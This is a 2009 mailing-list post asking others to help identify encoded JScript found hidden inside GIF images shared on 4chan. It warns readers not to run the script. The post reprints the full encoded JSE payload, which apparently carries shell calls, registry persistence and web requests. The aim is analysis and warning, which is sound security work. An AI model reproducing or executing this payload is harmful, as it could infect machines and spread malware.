Obfuscated Javascript in a JSE in an Image

[irongeek at irongeek.com (Adrian Crenshaw)]

Ok, I found these images on 4chan that have encoded javascript in them, you
have to safe the gif as a jse to run them (but don't!!!, I'm just uploading
the images to a forum so you can see what they are). Exactly how is this
encoded, and can anyone tell what it does? This seems to be the script part:

GIF89aI    =    "x1!??";
#@~^pwkAAA==-mD~XtMP',xAPzmOk7+p6(L+1O`rH/Xhs c(tSuKPKr#I@
#@&-lMPd4VV~x,xnh,)1Yr7+or4N+1O`rjmMk2Oc?tsVr#i@#@&-lMP6/GPx~
+APz^Yb\np}4Ln^D`E?1.bwObxTRsbVjXkYn:}4%n1YJ*I@
#@&\lM~r+,',xnh~)1Yr\pr(Ln^D`J(UD+.xOA62^WM+Dcba2VbmCYbWUE*i@#@&@#@&r?Ji@#@&dtV^R^E..xOfb.+1YG.HP'~WkW
oOUwn1kmVsKV9nDv bi@#@&d4VVc.E    `J1h[PJm,mGwz~'JEP3~UC
d1Dk2OwEsVgCs+~3Pr-J,/HdRN/nJ*i@#@&DDX,`@#@&J?Jp@#@&P,P,/4+sscDnoq.kD+cE_|Ziw'?G0DAmDn'-tkmMWkG0D-wbx[GS/-'/EMD+
O#+M/bWU-w]!xw-kz/N/nEBPJAd1DrwD~J4~rP3P0kWcL+D?2+1kCswWV9nDv
#,Q~J'-kXdR%dJbi@#@&8,mCO1t`nb,    N@#@&@#@&h4bV`F*PP~YMX~
@#@&@#@&,PP,atMRWanU`roYE~~E4YOw=&zb:L
WmtCUcW.oJ8JJS,!*i@#@&J?rI@#@&P~P,64.c/+D]+$E+kOu+mNDcJ(W
HGNbWkNRjbxmnEBPU+S~GlO`Z##p@#@&~P,PatMRdn    N`*I@
#@&PP,~-lMPalL+~x,64Dc.+kwGUk+KnaDi@#@&@#@&,P~,YMXPP@
#@&~P,P~P,Pa4MRWanxvJoOE~,wmonRhCDm4`J@!l,t.n6'Jc4DY2)'&'zrso'Rc1tmU-cW.o'z8wJ/D1wz'N_'
Rc#J#,FDS,!bi@#@&J?ri@#@&,PP~~,P~64.c/n    Nv#i@#@&,~P,P~P,\C.,k:,xP
+h,)^Yb\(64%n1YcJz[W94 jDD+Chr#I@#@&~,P~,P,PksRsGNPxP2i@#@&,PP,~P,Pks
OXa+,'~FI@#@&P~P,~P,PrhcWwnUv#I@#@&~,P~,P,PksRS.kD+c64D
./wKU/AW9zbi@#@&,P~P~~,Pr:cdl7+PGwkVncrL
Lknr~~y#p@#@&r?Jp@#@&,P~P,P~~kt+^sRMExvEA/1DbwOP&8,L
LknJ*i@#@&,PP~N,mCY14v+b,
)@#@&@#@&,~P,\CD,4[.HP',cJr_HmO4RMl
NG:cb*RdE(dYM`+bp@#@&~~,P-lM~4+C9P{PJ'D'UO
J~_,4[.HP_,E-M-x;GUYxDO9kd2K/rYbGx=PWGM:O[CDlIP    Cs+xri@
#@&@#@&P,~P7l.Pal.O8P',W/KRWanUK6DsrVncrXE~,+~,FbI@#@&J?EI@#@&~P,~al.DFchDbYctl[P3PE./YKwD'x-MwUJ,_,wCon
slOm4cz@!/2C    Pk[xrxGY4.l[v-9_#J#]qT,_~tl[~3PJ!20bV+p~Wk^+
lh+xCcor0'.-    -.w    J#I@#@&P~P,2mDO8R1VWk+vbi@#@&@#@&,P~~7lD,2lMY
,x~0kWcW2+UP6Osbs+vJ"EBP S~8#I@#@&E?ri@#@&P,PPalMO
ch.kD+ccrJ_tCY4RDmU[Ws`*# /;8kY.`ybP3P4nmNPQ~r:GNwM-U'D'xDobdY'Dwx
OE~3P49.X,_PrRR-M-    Jbi@#@&,P~PaCDD  ^^W/nc*i@
#@&@#@&,P~,/4+V^RM;xvJ^:9P&^,mWazPJ4PHQdXkRN/n_"~aJSPZSP8#I@#@&@#@&~~,P-lM~aWdDP{Pxh,)mDk-+or8%mYvEb9WN(
jYM+m:E#I@#@&J?Ei@#@&P,P~2K/Y hKNnP{~2i@#@&P,PPaWkORDX2+,'~qp@#@&,~P,wWkO
Wa+    `bi@#@&,P~PaG/DRsGmNs.GssrVcrwE*i@#@&@#@&P,~PDDzPP@#@&~,PP,~P,k+cUC\bomYn`E4DY2)J&kso
*1tlU KDLz(&r#I@#@&,PP,P,~P9W~    @#@&~~,PP,~P,PP,    jCc/^+nwcqZ!bi@
#@&J?ri@#@&,PP~~,P~8,A4ksPvk+cDCNH?OlD+~Z{Pc*I@#@&PP,~~P,Pb+ /OGa`bi@
#@&P,P~~,PPrncNGm!hxOcmKW3b+,xPrxA/|/Oz^+'p~+XwkMnd'rP3PU+A~GlO+vT#,_~EpPwCO4'&i,[K:Cbx{Rc1tmURKDLJp@#@&~,PP)~mmYm4cn#,
)@#@&@#@&E?ri@#@&,~P,64.cWwnUvJ2WkOr~~rtDYw=zJ[lDR*m4lU
KDoJ8zb:o(GCD9Rat2JS~Z#I@#@&~P,Pa4MR/nO"+5EdDCnmND`rZKUYxOO:X2nr~PrhE^YkaC.YJ0KDhO[CDlIP(GE
NC.H'J~Q,4[DHbp@#@&,P,P64Dcd+    NcwK/Obp@#@&@#@&P,PPqjuRkV+2`XTZ!T#p@
#@&@#@&N~1lY^4v+bPPN,8@#@&VKACAA==^#~@

If you wan to see the gifs in question, look at this post:

http://www.binrev.com/forums/index.php?showtopic=40285&hl=


Adrian
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090207/8149cac0/attachment.htm